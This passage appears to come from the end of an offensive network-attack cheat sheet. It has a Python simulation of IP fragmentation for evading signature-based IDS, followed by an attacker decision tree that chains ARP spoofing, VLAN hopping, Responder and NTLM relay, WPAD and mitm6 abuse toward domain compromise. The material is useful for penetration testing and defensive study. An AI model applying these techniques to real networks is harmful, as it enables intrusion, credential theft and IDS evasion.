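    """Split payload the way fragroute's `ip_frag <size>` or nmap --mtu <size> would.
    Returns (offset_bytes, more_fragments, chunk) tuples; order='random' mimics `order random`."""
    if frag_size % IP_FRAG_UNIT or frag_size <= 0:
        raise ValueError("fragment size must be a positive multiple of 8")
    frags = []
    for offset in range(0, len(payload), frag_size):
        chunk = payload[offset:offset + frag_size]
        frags.append((offset, offset + frag_size < len(payload), chunk))
    if order == "random":
        random.Random(seed).shuffle(frags)
    elif order == "reverse":
        frags.reverse()
    return frags


def reassemble(frags):
    """What the target host does: order by offset, require a gapless run that ends in a fragment with MF=0."""
    total = b""
    expected = 0
    last_seen = False
    for offset, more, chunk in sorted(frags, key=lambda f: f[0]):
        if offset != expected:
            raise ValueError(f"hole at byte offset {expected}")
        total += chunk
        expected += len(chunk)
        last_seen = not more
    if not last_seen:
        raise ValueError("final fragment missing")
    return total


def naive_ids_match(frags, signature):
    """A signature engine with no fragment reassembly: each fragment is inspected on its own."""
    return any(signature in chunk for _, _, chunk in frags)


def reassembling_ids_match(frags, signature):
    """A current engine (Snort frag3, Suricata defrag) reassembles before matching."""
    try:
        return signature in reassemble(frags)
    except ValueError:
        return False      # incomplete stream: nothing to match against yet


def evasion_report(payload=SAMPLE_REQUEST, signature=SIGNATURE, sizes=(8, 24, 32)):
    """For each fragment size: (naive engine hit?, reassembling engine hit?)."""
    return {size: (naive_ids_match(fragment(payload, size), signature),
                   reassembling_ids_match(fragment(payload, size, order="random", seed=1), signature))
            for size in sizes}


if __name__ == "__main__":
    for size, (naive, full) in evasion_report().items():
        print(f"--mtu {size:2d}: naive engine {'HIT' if naive else 'miss'}, reassembling engine {'HIT' if full else 'miss'}")
```

With this request the 11-byte signature straddles a fragment boundary at both 8 and 24 bytes, so a per-fragment engine misses it and only a 32-byte fragment size lets it match; the reassembling engine matches at every size, including when the fragments arrive shuffled, which is the practical reason the table above pairs fragmentation with timing, decoys and insertion rather than relying on it alone.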

10. DECISION TREE


Network access obtained — want to escalate via network attacks
├── On same broadcast domain as targets?
│   ├── YES → ARP spoof for MitM (§1)
│   │   └── Capture plaintext creds or redirect traffic
│   └── NO → need VLAN hopping first (§5)
│       ├── DTP enabled on your port? → switch spoofing (two-way access to every VLAN)
│       └── Your port in the trunk's native VLAN and target VLAN known? → double tagging (one-way, blind only)
├── Windows environment?
│   ├── LLMNR/NBT-NS enabled? (default YES)
│   │   └── Run Responder (§2) → capture NetNTLM hashes
│   │       ├── NTLMv1? → recover the NT hash (fast) or relay
│   │       └── NTLMv2? → relay (§2) first, crack with rules in the background
│   │
│   ├── WPAD auto-detect on? → WPAD abuse (§3); patched Windows only takes the PAC via DNS, so pair it with §4
│   │
│   └── IPv6 not hardened? (default) → mitm6 + ntlmrelayx (§4)
│       └── LDAP relay → RBCD → domain compromise
├── Need DNS control?
│   ├── MitM already established? → DNS response spoofing (§7)
│   └── DHCPv6 unfiltered? → mitm6 for DNS takeover (§4)
├── Managed switches with weak config?
│   ├── BPDU Guard off and you are dual-homed? → STP root bridge claim (§6)
│   └── DTP enabled? → VLAN hopping (§5)
├── IPv6 attack surface?
│   └── RA spoofing / SLAAC abuse (§8) → MitM over IPv6
└── IDS/IPS in path?
    └── Apply evasion techniques (§9) — fragmentation, timing, decoys; expect reassembly on current sensors